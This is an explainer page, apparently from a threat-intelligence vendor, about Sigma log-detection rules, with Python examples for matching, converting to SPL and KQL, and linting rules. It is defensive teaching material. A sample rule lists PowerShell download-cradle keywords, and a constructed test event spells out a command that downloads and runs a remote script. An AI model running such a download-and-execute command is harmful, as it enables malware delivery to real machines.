
What are Sigma Rules?

Sigma is a generic and open signature format for SIEM systems. Like YARA for files and Snort for network traffic, Sigma provides a standardized YAML format for log-based detection rules that can be converted to any SIEM query language.

A Universal Language for Detection Rules

Sigma was created in 2017 by Florian Roth and Thomas Patzke and is now maintained by the SigmaHQ community. It solves a fundamental problem in security operations: detection rules are locked to specific SIEM platforms. A Splunk SPL query cannot run in Microsoft Sentinel, and a Sentinel KQL query cannot run in Elastic, so security teams end up rewriting the same detection logic for every platform they operate.

Sigma provides a vendor-agnostic YAML format that describes what to detect (the log source, the matching conditions, and the severity) without specifying how any particular SIEM should execute the query. Converter tools (backends) translate a rule into a native query language such as SPL, KQL, ES|QL, Lucene or Chronicle YARA-L, while processing pipelines map Sigma's generic field names and log sources onto the schema each platform actually indexes.

The result is a write-once, deploy-anywhere detection ecosystem. A single Sigma rule can protect organizations running Splunk, Sentinel, Elastic, QRadar, Chronicle, Palo Alto XSIAM, and Sumo Logic simultaneously.

Anatomy of a Sigma Rule

Every Sigma rule is a YAML file with a well-defined structure. The key fields describe metadata, the log source to query, the detection logic, and the severity classification.

```yaml
title: Suspicious PowerShell Download Cradle      # human-readable rule name
id: 3b6ab547-1503-4a73-a956-4f4a5c4f5b21           # unique UUID
status: stable                                      # experimental | test | stable | deprecated | unsupported
description: |
  Detects PowerShell commands commonly used to download and execute payloads
  from remote servers, including IEX, Invoke-WebRequest, and Net.WebClient patterns.
author: Threadlinqs Intelligence
date: 2026-03-15
references:
  - https://attack.mitre.org/techniques/T1059/001/
tags:
  - attack.execution                                # MITRE tactic
  - attack.t1059.001                                # MITRE technique
  - attack.command_and_control
  - attack.t1105
logsource:                                          # what logs to query
  category: process_creation
  product: windows
detection:                                          # the matching logic
  selection_img:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_cmd:
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'Invoke-WebRequest'
      - 'Net.WebClient'
      - 'DownloadString'
      - 'DownloadFile'
  condition: selection_img and selection_cmd        # boolean logic
falsepositives:
  - Legitimate admin scripts using download cradles
  - Software deployment tools
level: high                                         # informational | low | medium | high | critical
```
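The detection section is the part every backend has to reproduce faithfully. The following is an added example (not the page's code and not pySigma) that evaluates that rule's detection logic directly over a few constructed process_creation events, so the matching semantics can be seen without a SIEM: case-insensitive comparison, * and ? wildcards, the contains/startswith/endswith/all modifiers, OR across list values, AND across a selection's fields, and the condition expression. The rule dict mirrors the YAML above; the events and the 198.51.100.7 address are constructed, not real telemetry.

```python
"""Evaluate the detection section of a Sigma rule against log events.

Added example, not pySigma and not the page's code. It implements the core
matching semantics a SIEM backend has to reproduce: case-insensitive string
comparison with * and ? wildcards, the contains / startswith / endswith / all
modifiers, OR across list values, AND across the fields of a selection, and a
condition built from and / or / not / parentheses.
"""
import ast
import re

# The page's rule as a dict (what yaml.safe_load() returns for the YAML above).
RULE = {
    "title": "Suspicious PowerShell Download Cradle",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_img": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"]},
        "selection_cmd": {"CommandLine|contains": [
            "IEX", "Invoke-Expression", "Invoke-WebRequest",
            "Net.WebClient", "DownloadString", "DownloadFile"]},
        "condition": "selection_img and selection_cmd",
    },
}


def value_to_regex(value, modifiers):
    """Compile one Sigma value (plus its modifiers) into a regex.

    Sigma matching is case-insensitive and '*' / '?' are wildcards;
    contains/startswith/endswith just add '*' at the relevant end.
    (Backslash-escaped literal wildcards are not handled here.)
    """
    text = str(value)
    if "contains" in modifiers:
        text = f"*{text}*"
    elif "startswith" in modifiers:
        text = f"{text}*"
    elif "endswith" in modifiers:
        text = f"*{text}"
    pattern = re.escape(text).replace(r"\*", ".*").replace(r"\?", ".")
    return re.compile(pattern, re.IGNORECASE | re.DOTALL)


def field_matches(event, key, expected):
    """One 'Field|modifier: value(s)' entry. A list means any value may match (OR),
    unless the |all modifier demands that every value matches."""
    field, *modifiers = key.split("|")
    if field not in event:
        return expected is None          # 'Field: null' matches an absent field
    values = expected if isinstance(expected, list) else [expected]
    actual = str(event[field])
    hits = [value_to_regex(v, modifiers).fullmatch(actual) is not None for v in values]
    return all(hits) if "all" in modifiers else any(hits)


def selection_matches(event, selection):
    """Map: every entry must match (AND). List: any entry may match (OR).
    Bare string: a keyword searched across all field values."""
    if isinstance(selection, str):
        rx = value_to_regex(selection, ["contains"])
        return any(rx.fullmatch(str(v)) for v in event.values())
    if isinstance(selection, dict):
        return all(field_matches(event, k, v) for k, v in selection.items())
    return any(selection_matches(event, item) for item in selection)


def eval_condition(condition, results):
    """Evaluate e.g. 'a and not (b or c)' over per-selection booleans.

    The text is parsed with ast and only Name / and / or / not nodes are
    accepted, so rule-controlled text never reaches eval(). The 'N of x*'
    forms of the spec are not supported here.
    """
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Name):
            return results[node.id]
        if isinstance(node, ast.BoolOp):
            combine = all if isinstance(node.op, ast.And) else any
            return combine(walk(v) for v in node.values)
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):
            return not walk(node.operand)
        raise ValueError(f"unsupported condition syntax: {ast.dump(node)}")
    return walk(ast.parse(condition, mode="eval"))


def rule_matches(rule, event):
    detection = rule["detection"]
    results = {name: selection_matches(event, sel)
               for name, sel in detection.items() if name != "condition"}
    return eval_condition(detection["condition"], results)


def find_matches(rule, events):
    """Return the ids of the events the rule fires on."""
    return [e["id"] for e in events if rule_matches(rule, e)]


# Constructed process_creation events using Sysmon Event ID 1 field names (not real telemetry).
EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a.ps1')\""},
    {"id": 2, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -Command Get-Process"},
    {"id": 3, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo DownloadString"},           # right string, wrong image
    {"id": 4, "Image": r"C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE",
     "CommandLine": "POWERSHELL -c invoke-webrequest http://198.51.100.7/x.ps1"},  # case differs
]

if __name__ == "__main__":
    print("events matched:", find_matches(RULE, EVENTS))   # [1, 4]
```

Event 3 shows why the condition ANDs both selections: a download-cradle string in a cmd.exe command line is not enough on its own. Event 4 fires because Sigma comparisons are case-insensitive, which is also why a backend must emit case-insensitive operators rather than exact equality.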

Write Once, Convert Everywhere

The Sigma conversion pipeline is what makes the format transformative. A single rule written in Sigma YAML can be automatically converted into native queries for every major SIEM platform.

Sigma YAML --> pySigma / sigma-cli --> SPL / KQL / ES|QL / Lucene / YARA-L / ...
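To make that pipeline concrete, here is an added example (not pySigma's code and not its exact output) of what a backend and a processing pipeline do to the detection section of the rule above: the same selections rendered once as an SPL search and once as a KQL query. The backend part maps modifiers to each language's operators and escapes values; the pipeline part renames fields. The SecurityEvent table and the Image to NewProcessName rename are a hypothetical mapping chosen for illustration.

```python
"""Toy Sigma backend: one detection section rendered as SPL and as KQL.

Added example; a simplified illustration of what a pySigma backend (syntax)
and a processing pipeline (field names) do, not pySigma's code or its exact
output. Handles equality, contains/startswith/endswith, list values and
and/or/not conditions. The Sentinel field mapping is hypothetical.
"""
import re

# Detection section of the page's rule (as yaml.safe_load would return it).
DETECTION = {
    "selection_img": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"]},
    "selection_cmd": {"CommandLine|contains": [
        "IEX", "Invoke-Expression", "Invoke-WebRequest",
        "Net.WebClient", "DownloadString", "DownloadFile"]},
    "condition": "selection_img and selection_cmd",
}

# Hypothetical processing pipeline: Sigma's generic process_creation fields
# renamed to Sentinel SecurityEvent (4688) columns. Real mappings live in the
# pysigma-pipeline-* packages; the SPL side below is left unmapped on purpose.
SENTINEL_FIELDS = {"Image": "NewProcessName", "CommandLine": "CommandLine"}

SPL_OPS = {"and": "AND", "or": "OR", "not": "NOT"}
KQL_OPS = {"and": "and", "or": "or", "not": "not"}


def quote(value):
    """Double-quoted literal; backslash and quote escaping is the same in SPL and KQL."""
    return '"' + str(value).replace("\\", "\\\\").replace('"', '\\"') + '"'


def spl_term(field, modifiers, value):
    """SPL '=' is case-insensitive and treats * as a wildcard, so modifiers become *s."""
    if "contains" in modifiers:
        value = f"*{value}*"
    elif "startswith" in modifiers:
        value = f"{value}*"
    elif "endswith" in modifiers:
        value = f"*{value}"
    return f"{field}={quote(value)}"


def kql_term(field, modifiers, value):
    """KQL has native contains/startswith/endswith (case-insensitive) and =~ for equality."""
    if "*" in str(value) or "?" in str(value):
        raise ValueError("wildcards inside values need 'matches regex'; not handled here")
    op = next((m for m in ("contains", "startswith", "endswith") if m in modifiers), "=~")
    return f"{SENTINEL_FIELDS.get(field, field)} {op} {quote(value)}"


def convert(detection, term, ops):
    """Render each selection, then substitute the selections into the condition."""
    clauses = {}
    for name, selection in detection.items():
        if name == "condition":
            continue
        parts = []
        for key, expected in selection.items():
            field, *modifiers = key.split("|")
            values = expected if isinstance(expected, list) else [expected]
            parts.append(f" {ops['or']} ".join(term(field, modifiers, v) for v in values))
        if len(parts) > 1:   # AND across fields; parenthesise a field that ORs several values
            parts = [f"({p})" if f" {ops['or']} " in p else p for p in parts]
        clauses[name] = f" {ops['and']} ".join(parts)

    def substitute(match):
        token = match.group(0)
        if token in ops:
            return ops[token]
        if token in clauses:
            return f"({clauses[token]})"
        raise ValueError(f"unsupported condition token: {token}")   # e.g. '1 of them'

    return re.sub(r"[A-Za-z_]\w*", substitute, detection["condition"])


def to_spl(detection):
    return convert(detection, spl_term, SPL_OPS)


def to_kql(detection, table="SecurityEvent"):
    return f"{table}\n| where " + convert(detection, kql_term, KQL_OPS)


if __name__ == "__main__":
    print(to_spl(DETECTION))
    print(to_kql(DETECTION))
```

The two outputs differ only in syntax and field names; the logic, including case-insensitivity, comes entirely from the Sigma rule. That separation is what lets one rule be regenerated for a new SIEM by swapping the backend and pipeline rather than rewriting the detection.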

Platform Independence

Security teams migrating from Splunk to Sentinel (or running both) can carry their detection logic with them. No manual rewriting required.

Community-Driven

The SigmaHQ repository on GitHub contains over 3,000 community-contributed rules covering common and advanced adversary behaviors, maintained by hundreds of contributors.

ATT&CK Integration

Sigma rules use ATT&CK tags natively. Every rule can be mapped to tactics and technique IDs, enabling coverage analysis against the MITRE framework.

Detection-as-Code

YAML is version-controllable. Teams store Sigma rules in Git, review changes via pull requests, and deploy updates through CI/CD pipelines.

Sigma vs SPL vs KQL

Each format has distinct strengths. Sigma prioritizes portability, while SPL and KQL prioritize depth within their respective ecosystems.

Format. Sigma: YAML. SPL: proprietary query language. KQL: proprietary query language.
Portability. Sigma: any SIEM via backends. SPL: Splunk only. KQL: Microsoft Sentinel / Defender.
Ecosystem. Sigma: 3,000+ SigmaHQ rules, pySigma, sigma-cli. SPL: Splunkbase apps, Splunk ES content. KQL: Microsoft Sentinel content hub.
Complexity. Sigma: declarative, low barrier to entry. SPL: full programming constructs, macros, lookups. KQL: functional syntax, joins, materialized views.
Performance tuning. Sigma: handled by the backend converter. SPL: direct index/sourcetype control. KQL: direct table/time-range optimization.
Version control. Sigma: native (YAML in Git). SPL: requires an export/import workflow. KQL: requires an export/import workflow.

The SigmaHQ Repository

The SigmaHQ/sigma repository on GitHub is the canonical source for community-maintained Sigma rules. As of 2026, it contains over 3,000 detection rules organized by log source category.

Rules go through a review process before being merged. Each rule must include a valid logsource definition, at least one false-positive consideration, appropriate ATT&CK tags, and a severity level. The SigmaHQ GitHub organization also maintains, in sibling repositories, the Sigma specification itself, the backend converters, and the processing pipelines for field mapping and log source translation.

The conversion toolchain has evolved from the original sigmac converter, now deprecated, to the modern pySigma ecosystem. pySigma uses a modular architecture with separate packages for backends (output formats), processing pipelines (field and log source mappings), and validators (rule quality checks).

How Threadlinqs Uses Sigma

Every threat on the Threadlinqs platform includes detection rules in three formats: SPL, KQL, and Sigma. Sigma rules are auto-generated alongside platform-specific queries so that teams running any SIEM have ready-to-deploy detections.

1,248 Sigma Rules
Production-ready Sigma rules in the detection library, each mapped to a specific threat and ATT&CK technique.

3 Formats Per Detection
Every detection ships as SPL + KQL + Sigma. Copy the format your SIEM needs directly from the threat detail panel.

344 Threats Covered
Sigma rules span the full threat feed, from APT campaigns and supply-chain attacks to ransomware and zero-days.


Frequently Asked Questions

How do I convert Sigma rules to Splunk SPL?

Use sigma-cli, the command-line front end of the pySigma library, together with the Splunk backend and a processing pipeline that maps Sigma's generic fields onto your data (for Sysmon-sourced Windows logs, the sysmon pipeline). Install them with pip install sigma-cli pysigma-backend-splunk pysigma-pipeline-sysmon (or, once sigma-cli is installed, sigma plugin install splunk), then run sigma convert -t splunk -p sysmon rule.yml to produce a ready-to-use SPL query; point the same command at a directory of rules for batch conversion. Threadlinqs ships pre-converted SPL alongside every Sigma rule, so no manual conversion is needed.

What's the difference between Sigma and YARA?

Sigma and YARA serve different detection domains. YARA rules match patterns in files and memory — they are used for malware analysis, scanning binaries, and identifying malicious payloads on disk. Sigma rules match patterns in log events — they are used for SIEM-based detection of adversary behavior in telemetry data like process creation, network connections, and authentication events. Think of YARA as detection for files and Sigma as detection for logs.

How do I contribute to SigmaHQ?

Fork the SigmaHQ/sigma repository on GitHub, create a new rule following the Sigma specification and naming conventions, validate it with sigma check, and submit a pull request. Rules should include a descriptive title, accurate logsource definition, at least one false-positive consideration, appropriate level and status fields, and relevant ATT&CK tags. The SigmaHQ maintainers review submissions for quality and accuracy before merging.
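The checklist in this answer and in The SigmaHQ Repository section above can be enforced locally before a pull request is opened. The following is an added example (not sigma check, not SigmaHQ's own validators) of a small linter that checks those points on a rule loaded as a dict, run against the page's rule and against a constructed rule with several violations. Rules are assumed to be dicts as yaml.safe_load would produce them; the status and level vocabularies are those of the Sigma specification.

```python
"""Lint a Sigma rule against the SigmaHQ submission checklist.

Added example, not SigmaHQ's validator (that is `sigma check` from sigma-cli
plus the pySigma validators). Checks: required fields, UUID id, date format,
level and status vocabularies, a usable logsource, a non-empty falsepositives
list, well-formed ATT&CK tags with at least one technique, and a condition
that references only defined selections. Input is a dict (yaml.safe_load output).
"""
import re
import uuid
from fnmatch import fnmatchcase

LEVELS = {"informational", "low", "medium", "high", "critical"}
STATUSES = {"experimental", "test", "stable", "deprecated", "unsupported"}
REQUIRED = ("title", "id", "description", "logsource", "detection",
            "falsepositives", "level", "status")
TAG_RE = re.compile(r"^attack\.(t\d{4}(\.\d{3})?|[a-z_]+)$")   # attack.t1059.001 / attack.execution
DATE_RE = re.compile(r"^\d{4}[-/]\d{2}[-/]\d{2}$")              # 2026-03-15 (spec v1 used slashes)
CONDITION_KEYWORDS = {"and", "or", "not", "of", "them", "all"}


def lint_rule(rule):
    """Return the list of problems found; an empty list means the rule passes."""
    problems = [f"missing required field: {k}" for k in REQUIRED if k not in rule]

    if "id" in rule:
        try:
            uuid.UUID(str(rule["id"]))
        except ValueError:
            problems.append(f"id is not a UUID: {rule['id']}")

    if "date" in rule and not DATE_RE.match(str(rule["date"])):
        problems.append(f"date is not YYYY-MM-DD: {rule['date']}")

    if "level" in rule and rule["level"] not in LEVELS:
        problems.append(f"unknown level: {rule['level']}")
    if "status" in rule and rule["status"] not in STATUSES:
        problems.append(f"unknown status: {rule['status']}")

    logsource = rule.get("logsource") or {}
    if not isinstance(logsource, dict) or not ({"category", "product", "service"} & set(logsource)):
        problems.append("logsource needs at least one of category, product, service")

    fps = rule.get("falsepositives")
    if "falsepositives" in rule and (not isinstance(fps, list) or not fps):
        problems.append("falsepositives must be a non-empty list")

    tags = rule.get("tags") or []
    malformed = [t for t in tags if not TAG_RE.match(str(t))]
    if malformed:
        problems.append(f"malformed tags: {malformed}")
    if not any(str(t).startswith("attack.t") for t in tags):
        problems.append("no ATT&CK technique tag (attack.tNNNN)")

    detection = rule.get("detection") or {}
    selections = [k for k in detection if k != "condition"]
    if not selections:
        problems.append("detection defines no selection")
    if "condition" not in detection:
        problems.append("detection has no condition")
    else:   # every identifier in the condition must name (or wildcard-match) a selection
        for tok in re.findall(r"[A-Za-z_][\w*]*", str(detection["condition"])):
            if tok in CONDITION_KEYWORDS:
                continue
            if not any(fnmatchcase(s, tok) for s in selections):
                problems.append(f"condition references undefined selection: {tok}")
    return problems


# The page's rule as yaml.safe_load would load it (description and lists abbreviated).
GOOD_RULE = {
    "title": "Suspicious PowerShell Download Cradle",
    "id": "3b6ab547-1503-4a73-a956-4f4a5c4f5b21",
    "status": "stable",
    "description": "Detects PowerShell download cradles (IEX, Invoke-WebRequest, Net.WebClient).",
    "author": "Threadlinqs Intelligence",
    "date": "2026-03-15",
    "tags": ["attack.execution", "attack.t1059.001", "attack.command_and_control", "attack.t1105"],
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_img": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"]},
        "selection_cmd": {"CommandLine|contains": ["IEX", "DownloadString"]},
        "condition": "selection_img and selection_cmd",
    },
    "falsepositives": ["Legitimate admin scripts using download cradles"],
    "level": "high",
}

# Constructed rule that review would bounce: bad id, date, level, status, tag,
# empty logsource, missing falsepositives, and a filter the condition never defines.
BAD_RULE = {
    "title": "Something suspicious",
    "id": "rule-42",
    "status": "draft",
    "description": "TODO",
    "date": "15/03/2026",
    "tags": ["attack.T1059.001", "attack.execution"],
    "logsource": {},
    "detection": {
        "selection": {"CommandLine|contains": "IEX"},
        "condition": "selection and not filter_admin",
    },
    "level": "severe",
}

if __name__ == "__main__":
    for name, rule in (("good", GOOD_RULE), ("bad", BAD_RULE)):
        print(name, lint_rule(rule) or "OK")
```

Wired into CI as a pre-merge step, a check like this catches the mechanical problems (bad UUIDs, undefined selections, missing false-positive notes) before a human reviewer spends time on the detection logic itself.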

1,248 Sigma rules across 344 threats — ready to convert or deploy directly.
